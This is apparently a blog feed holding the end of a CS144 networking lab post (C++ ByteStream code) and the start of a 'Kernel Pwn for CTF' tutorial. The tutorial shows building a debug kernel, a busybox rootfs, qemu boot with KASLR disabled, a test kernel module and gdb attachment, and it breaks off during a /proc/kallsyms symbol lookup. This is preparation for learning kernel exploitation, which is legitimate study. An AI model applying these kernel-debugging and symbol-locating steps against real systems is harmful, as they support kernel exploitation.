\name &quot;Output&quot; interface for the reader</span></span><br><span class="line">    <span class="comment">//!@&#123;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Peek at next &quot;len&quot; bytes of the stream</span></span><br><span class="line">    <span class="comment">//! \returns a string</span></span><br><span class="line">    <span class="function">std::string <span class="title">peek_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Remove bytes from the buffer</span></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">pop_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Read (i.e., copy and then pop) the next &quot;len&quot; bytes of the stream</span></span><br><span class="line">    <span class="comment">//! \returns a string</span></span><br><span class="line">    <span class="function">std::string <span class="title">read</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns `true` if the stream input has ended</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">input_ended</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! 
\returns `true` if the stream has suffered an error</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">error</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _error; &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns the maximum amount that can currently be read from the stream</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">buffer_size</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns `true` if the buffer is empty</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">buffer_empty</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \returns `true` if the output has reached the ending</span></span><br><span class="line">    <span class="function"><span class="type">bool</span> <span class="title">eof</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">    <span class="comment">//!@&#125;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! \name General accounting</span></span><br><span class="line">    <span class="comment">//!@&#123;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//! 
Total number of bytes written</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">bytes_written</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! Total number of bytes popped</span></span><br><span class="line">    <span class="function"><span class="type">size_t</span> <span class="title">bytes_read</span><span class="params">()</span> <span class="type">const</span></span>;</span><br><span class="line">    <span class="comment">//!@&#125;</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The member function implementations:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span 
class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">ByteStream::<span class="built_in">ByteStream</span>(<span class="type">const</span> <span class="type">size_t</span> capacity)</span><br><span class="line">    : _queue(), _capacity_size(capacity), _written_size(<span class="number">0</span>), _read_size(<span class="number">0</span>), _end_input(<span class="literal">false</span>), _error(<span class="literal">false</span>) &#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::write</span><span class="params">(<span class="type">const</span> string &amp;data)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (_end_input)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="type">size_t</span> write_size = <span class="built_in">min</span>(data.<span class="built_in">size</span>(), _capacity_size - _queue.<span class="built_in">size</span>());</span><br><span class="line">    _written_size += write_size;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; write_size; i++)</span><br><span class="line">        _queue.<span class="built_in">push_back</span>(data[i]);</span><br><span class="line">    <span class="keyword">return</span> write_size;</span><br><span class="line">&#125;</span><br><span 
class="line"></span><br><span class="line"><span class="comment">//! \param[in] len bytes will be copied from the output side of the buffer</span></span><br><span class="line"><span class="function">string <span class="title">ByteStream::peek_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> <span class="type">const</span> </span>&#123;</span><br><span class="line">    <span class="type">size_t</span> pop_size = <span class="built_in">min</span>(len, _queue.<span class="built_in">size</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">string</span>(_queue.<span class="built_in">begin</span>(), _queue.<span class="built_in">begin</span>() + pop_size);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param[in] len bytes will be removed from the output side of the buffer</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">ByteStream::pop_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> </span>&#123;</span><br><span class="line">    <span class="type">size_t</span> pop_size = <span class="built_in">min</span>(len, _queue.<span class="built_in">size</span>());</span><br><span class="line">    _read_size += pop_size;  <span class="comment">// count only the bytes actually removed</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; pop_size; i++)</span><br><span class="line">        _queue.<span class="built_in">pop_front</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! Read (i.e., copy and then pop) the next &quot;len&quot; bytes of the stream</span></span><br><span class="line"><span class="comment">//! 
\param[in] len bytes will be popped and returned</span></span><br><span class="line"><span class="comment">//! \returns a string</span></span><br><span class="line"><span class="function">std::string <span class="title">ByteStream::read</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> </span>&#123;</span><br><span class="line">    string data = <span class="keyword">this</span>-&gt;<span class="built_in">peek_output</span>(len);</span><br><span class="line">    <span class="keyword">this</span>-&gt;<span class="built_in">pop_output</span>(len);</span><br><span class="line">    <span class="keyword">return</span> data;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">ByteStream::end_input</span><span class="params">()</span> </span>&#123; _end_input = <span class="literal">true</span>; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">ByteStream::input_ended</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _end_input; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::buffer_size</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _queue.<span class="built_in">size</span>(); &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">ByteStream::buffer_empty</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _queue.<span class="built_in">empty</span>(); &#125;</span><br><span class="line"></span><br><span class="line"><span 
class="function"><span class="type">bool</span> <span class="title">ByteStream::eof</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _end_input &amp;&amp; _queue.<span class="built_in">empty</span>(); &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::bytes_written</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _written_size; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::bytes_read</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _read_size; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::remaining_capacity</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _capacity_size - _queue.<span class="built_in">size</span>(); &#125;</span><br></pre></td></tr></table></figure><p>Lab0 is fairly easy, and as the screenshot shows, the checks all pass:</p><p><img src="/2021/11/cs144-lab0/image-20211107094712926.png" alt="image-20211107094712926"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;This post records the steps I took to set up the lab environment for the CS144 computer networking course.&lt;/p&gt;
&lt;p&gt;CS144 Lab0 handout - &lt;a href=&quot;https://cs144.github.io/assignments/lab0.pdf&quot;&gt;Lab Checkpoint 0: networking warmup&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>Introduction to Kernel Pwn for CTF</title>
    <link href="https://kiprey.github.io/2021/10/kernel_pwn_introduction/"/>
    <id>https://kiprey.github.io/2021/10/kernel_pwn_introduction/</id>
    <published>2021-10-02T05:39:22.000Z</published>
    <updated>2025-11-24T03:59:40.022Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>An introduction to kernel CTF challenges, based mainly on <a href="https://wiki.x10sec.org/pwn/linux/kernel-mode/environment/readme/">CTF-Wiki</a>.</p><span id="more"></span><h2 id="二、环境配置">II. Environment Setup</h2><ul><li><p>Debugging the kernel calls for a good gdb plugin; gef is used here.</p><blockquote><p>According to other CTF players, peda and pwndbg run into many inexplicable problems when debugging the kernel.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pip3 install capstone unicorn keystone-engine ropper</span><br><span class="line">git <span class="built_in">clone</span> https://github.com/hugsy/gef.git</span><br><span class="line"><span class="built_in">echo</span> <span class="built_in">source</span> `<span class="built_in">pwd</span>`/gef/gef.py &gt;&gt; ~/.gdbinit</span><br></pre></td></tr></table></figure></li><li><p>Download the Linux kernel tarball from the <a href="https://mirrors.tuna.tsinghua.edu.cn/kernel/">Tsinghua mirror</a> and extract it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.9.8.tar.xz</span><br><span class="line">unxz linux-5.9.8.tar.xz</span><br><span class="line">tar -xf linux-5.9.8.tar</span><br></pre></td></tr></table></figure></li><li><p>Enter the source directory and configure the build:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> linux-5.9.8</span><br><span class="line">make menuconfig</span><br></pre></td></tr></table></figure><p>In the menu, enable:</p><ul><li><code>Kernel hacking -&gt; Compile-time checks and compiler options -&gt; Compile the kernel with debug info</code></li><li><code>Kernel hacking -&gt; Generic Kernel Debugging 
Instruments -&gt; KGDB: kernel debugger</code></li></ul><p>Then save the configuration and exit.</p></li><li><p>Build the kernel (32-bit by default):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make -j 8 bzImage</span><br></pre></td></tr></table></figure><blockquote><p>Running a plain <code>make -j 8</code> is not recommended, because it builds a great many things that will most likely never be used.</p></blockquote><p>A few pitfalls here:</p><ul><li><p>Missing dependencies.</p><p>Fix: install whatever the make error message reports as missing, for example:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install libelf-dev</span><br></pre></td></tr></table></figure></li><li><p><code>make[1]: *** No rule to make target 'debian/certs/debian-uefi-certs.pem', needed by 'certs/x509_certificate_list'.  Stop.</code></p><p>Fix: set <code>CONFIG_SYSTEM_TRUSTED_KEYS</code> in <code>.config</code> to an empty string, then run make again.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Certificates for signature checking</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line">CONFIG_SYSTEM_TRUSTED_KEYS=<span class="string">&quot;&quot;</span> <span class="comment"># leave empty; do not delete this entry</span></span><br></pre></td></tr></table></figure></li></ul><p>The build is complete once the following output appears:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Setup is 15420 bytes (padded to 15872 bytes).</span><br><span class="line">System is 5520 kB</span><br><span class="line">CRC 70701790</span><br><span 
class="line">Kernel: arch/x86/boot/bzImage is ready  (#2)</span><br></pre></td></tr></table></figure></li><li><p>Finally, before booting the kernel, build a file system first; otherwise the kernel panics because it has no root file system:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0)</span><br></pre></td></tr></table></figure><p>First download the busybox source code:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget https://busybox.net/downloads/busybox-1.34.1.tar.bz2</span><br><span class="line">tar -jxf busybox-1.34.1.tar.bz2</span><br></pre></td></tr></table></figure><p>Then configure and build it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> busybox-1.34.1</span><br><span class="line">make menuconfig</span><br><span class="line">make -j 8</span><br></pre></td></tr></table></figure><p>In the menuconfig screen:</p><ul><li><p>Under Settings, select Build static binary (no shared libs) so that busybox is built as a statically linked binary (the kernel does not provide libc).</p><p>Note that static compilation and linking requires an additional dependency, <code>glibc-static</code>. Install it with one of the following commands:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Red Hat / CentOS family:</span></span><br><span class="line"><span class="built_in">sudo</span> yum install glibc-static</span><br><span class="line"><span class="comment"># Debian / Ubuntu family:</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install libc6-dev</span><br></pre></td></tr></table></figure></li><li><p>Under Linux System Utilities, deselect Support mounting NFS file systems on Linux &lt; 2.6.23 (NEW).</p><blockquote><p>This option is not selected by default in the current version, so this step can be skipped.</p></blockquote></li></ul><p>After the build finishes, run <code>make install</code>. This generates the <code>_install</code> directory, which will become our rootfs.</p><p>Next, run the following inside the <code>_install</code> directory to create a set of directories:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> -p  proc sys dev etc/init.d</span><br></pre></td></tr></table></figure><p>Then, in the rootfs (that is, in the <code>_install</code> directory), write the following mount script as a file named init:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;INIT SCRIPT&quot;</span></span><br><span class="line"><span class="built_in">mkdir</span> /tmp</span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">mount -t debugfs none /sys/kernel/debug</span><br><span class="line">mount -t tmpfs none /tmp</span><br><span class="line"><span class="built_in">echo</span> -e <span class="string">&quot;Boot took <span class="subst">$(cut -d&#x27; &#x27; -f1 /proc/uptime)</span> seconds&quot;</span></span><br><span class="line">setsid /bin/cttyhack setuidgid 1000 /bin/sh</span><br></pre></td></tr></table></figure><p>Finally, make the init script executable and pack the rootfs:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">chmod</span> +x ./init</span><br><span class="line"><span class="comment"># Pack the rootfs</span></span><br><span class="line">find . | cpio -o --format=newc &gt; ../../rootfs.img</span><br><span class="line"><span class="comment"># Unpack it again</span></span><br><span class="line"><span class="comment"># cpio -idmv &lt; rootfs.img</span></span><br></pre></td></tr></table></figure><blockquote><p>Building and installing busybox is not strictly required for creating a rootfs, but it is strongly recommended, because busybox provides many useful tools for working with the kernel.</p></blockquote></li><li><p>Boot the kernel with qemu. These are the boot parameters recommended by CTF wiki:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -m 64M \</span><br><span class="line">    -nographic \</span><br><span class="line">    -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">    -initrd  ./rootfs.img \</span><br><span class="line">    -append <span class="string">&quot;root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr&quot;</span> \</span><br><span class="line">    -smp cores=2,threads=1 \</span><br><span class="line">    -cpu kvm64</span><br></pre></td></tr></table></figure><p>To keep the number of options small, these are the parameters I use:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 
\</span><br><span class="line">  -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">  -initrd ./rootfs.img \</span><br><span class="line">  -append <span class="string">&quot;nokaslr&quot;</span></span><br></pre></td></tr></table></figure><blockquote><p>Using fewer boot parameters lets us ignore some unnecessary details while getting started.</p><p>Only three parameters are set here:</p><ul><li><p><code>-kernel</code> specifies the path to the kernel image bzImage</p></li><li><p><code>-initrd</code> specifies the in-memory file system the kernel boots with</p></li><li><p><code>-append &quot;nokaslr&quot;</code> disables kernel ASLR (KASLR) to make the kernel easier to debug</p><p>Note: <strong>be very, very careful not to type <code>nokaslr</code> as <code>nokalsr</code></strong>. That typo cost me an entire afternoon of kernel debugging…</p><p>And yes, the nokaslr on CTF Wiki is wrong too: it is spelled nokalsr there (lol)</p></li></ul></blockquote><p>Once the kernel has booted, the built-in shell is ready to use.</p></li></ul><h2 id="三、内核驱动的编写与调试">III. Writing and Debugging Kernel Drivers</h2><h3 id="1-构建过程">1. Build</h3><p>We first create a new directory inside the linux kernel source tree:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">linux-5.9.8 $ <span class="built_in">mkdir</span> mydrivers</span><br></pre></td></tr></table></figure><p>Then place a driver source file, <code>ko_test.c</code>, in that directory. The code is copied verbatim from CTF-wiki:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span 
class="string">&lt;linux/module.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/kernel.h&gt;</span></span></span><br><span class="line">MODULE_LICENSE(<span class="string">&quot;Dual BSD/GPL&quot;</span>);</span><br><span class="line"><span class="type">static</span> <span class="type">int</span> <span class="title function_">ko_test_init</span><span class="params">(<span class="type">void</span>)</span> </span><br><span class="line">&#123;</span><br><span class="line">    printk(<span class="string">&quot;This is a test ko!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">ko_test_exit</span><span class="params">(<span class="type">void</span>)</span> </span><br><span class="line">&#123;</span><br><span class="line">    printk(<span class="string">&quot;Bye Bye~\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">module_init(ko_test_init);</span><br><span class="line">module_exit(ko_test_exit);</span><br></pre></td></tr></table></figure><p>Once the code is written, add a <code>Makefile</code> next to it:</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Which kernel modules to build</span></span><br><span class="line">obj-m += ko_test.o</span><br><span 
class="line"></span><br><span class="line"><span class="comment"># Path to the kernel source tree</span></span><br><span class="line">KDIR =/usr/class/kernel_pwn/linux-5.9.8</span><br><span class="line"></span><br><span class="line"><span class="section">all:</span></span><br><span class="line">        <span class="comment"># -C makes make change into the kernel source tree first</span></span><br><span class="line">        <span class="comment"># M= points at the driver source directory, so the kernel build system returns there before building and generates the module in that directory</span></span><br><span class="line">        <span class="variable">$(MAKE)</span> -C <span class="variable">$(KDIR)</span> M=<span class="variable">$(PWD)</span> modules</span><br><span class="line"></span><br><span class="line"><span class="section">clean:</span></span><br><span class="line">        rm -rf *.o *.ko *.mod.* *.symvers *.order</span><br></pre></td></tr></table></figure><blockquote><p>Things to watch out for:</p><ol><li><p>The file must be named Makefile with a capital <code>M</code>; otherwise the build fails with the following error:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">scripts/Makefile.build:44: /usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile: No such file or directory</span><br><span class="line">make[2]: *** No rule to make target <span class="string">&#x27;/usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile&#x27;</span>.  Stop.</span><br></pre></td></tr></table></figure></li><li><p>The <code>obj-m</code> entry in the Makefile must match the file name of the driver source above; otherwise the build fails with the following error:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make[2]: *** No rule to make target <span class="string">&#x27;/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.o&#x27;</span>, needed by <span class="string">&#x27;/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.mod&#x27;</span>.  
Stop.</span><br></pre></td></tr></table></figure></li><li><p>If make fails with the following error:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">makefile:6: *** missing separator.  Stop.</span><br></pre></td></tr></table></figure><p>open the Makefile in vim, press <code>i</code> to enter insert mode, replace the leading spaces in front of the make command with a tab, then press Esc and type <code>:wq</code> to save the change.</p></li></ol></blockquote><p>Finally, run <code>make</code> to build the driver. Afterwards the directory looks like this:</p><blockquote><p>The only file we care about here is <code>ko_test.ko</code>.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ tree                  </span><br><span class="line">.</span><br><span class="line">├── ko_test.c</span><br><span class="line">├── ko_test.ko</span><br><span class="line">├── ko_test.mod</span><br><span class="line">├── ko_test.mod.c</span><br><span class="line">├── ko_test.mod.o</span><br><span class="line">├── ko_test.o</span><br><span class="line">├── Makefile</span><br><span class="line">├── modules.order</span><br><span class="line">└── Module.symvers</span><br><span class="line"></span><br><span class="line">0 directories, 9 files</span><br></pre></td></tr></table></figure><h3 id="2-运行过程">2. 
Running the module</h3><p>Copy the freshly built <code>*.ko</code> file into the rootfs directory (<code>busybox-1.34.1/_install</code>),</p><p>then edit the <code>busybox-1.34.1/_install/init</code> script as follows:</p><blockquote><p>/bin/sh has to be started with root privileges here so that the shell is allowed to run the <code>dmesg</code> command.</p></blockquote><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">echo &quot;INIT SCRIPT&quot;</span><br><span class="line">mkdir /tmp</span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">mount -t debugfs none /sys/kernel/debug</span><br><span class="line">mount -t tmpfs none /tmp</span><br><span class="line"><span class="addition">+ insmod /ko_test.ko # load the kernel module</span></span><br><span class="line">echo -e &quot;Boot took $(cut -d&#x27; &#x27; -f1 /proc/uptime) seconds&quot;</span><br><span class="line"><span class="deletion">- setsid /bin/cttyhack setuidgid 1000 /bin/sh</span></span><br><span class="line"><span class="addition">+ setsid /bin/cttyhack setuidgid 0 /bin/sh # set uid and gid to 0 so that /bin/sh runs as root</span></span><br><span class="line"><span class="addition">+ poweroff -f # power the machine off once the shell exits</span></span><br></pre></td></tr></table></figure><p>Repack the rootfs and start qemu. Running <code>dmesg</code> then shows that the ko_test module was loaded successfully:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211002133722875.png" alt="image-20211002133722875"></p><blockquote><p>Normally, running qemu pops up a small 
GUI window. To have the boot output appear in the current terminal, as in the screenshot above, pass these additional options when starting qemu:</p><ul><li><code>-nographic</code></li><li><code>-append &quot;console=ttyS0&quot;</code></li></ul></blockquote><h3 id="3-调试过程">3. Debugging</h3><h4 id="a-attach-qemu">a. attach qemu</h4><p>When debugging, it is best to run <code>/bin/sh</code> as root. The required change was described above, so it is not repeated here.</p><p>When starting qemu, add the option <code>-gdb tcp::1234</code> (or the equivalent <code>-s</code>); qemu then gets ready for gdb to attach. If you want qemu to pause immediately at startup, you must also pass <code>-S</code>.</p><p>In addition, to use the vmlinux symbol table while debugging the kernel, <strong>you must pass <code>-append &quot;nokaslr&quot;</code> to disable kernel ASLR</strong>. Only then do the symbols line up with the actual addresses in memory; <strong>otherwise breakpoints on the target functions will not work</strong>.</p><p>Once qemu is running, <strong>open a separate terminal</strong> and run <code>gdb -q -ex &quot;target remote localhost:1234&quot;</code> to attach to qemu.</p><p>After gdb has attached to qemu, you can load the vmlinux symbol table, set breakpoints on specific functions, and enter <code>continue</code> to run to the target function.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># qemu was started with -S and is paused; enter the following commands in gdb</span></span><br><span class="line">gef&gt; add-symbol-file vmlinux</span><br><span class="line">gef&gt; b start_kernel</span><br><span class="line">gef&gt; <span class="built_in">continue</span></span><br><span class="line"></span><br><span class="line">[Breakpoint 1, start_kernel () at init/main.c:837]</span><br><span class="line">......</span><br></pre></td></tr></table></figure><p>For symbols inside the kernel, the following commands, run in the guest shell, show the address at which a symbol is loaded in memory:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># grep &lt;symbol_name&gt; /proc/kallsyms</span></span><br><span class="line">grep 
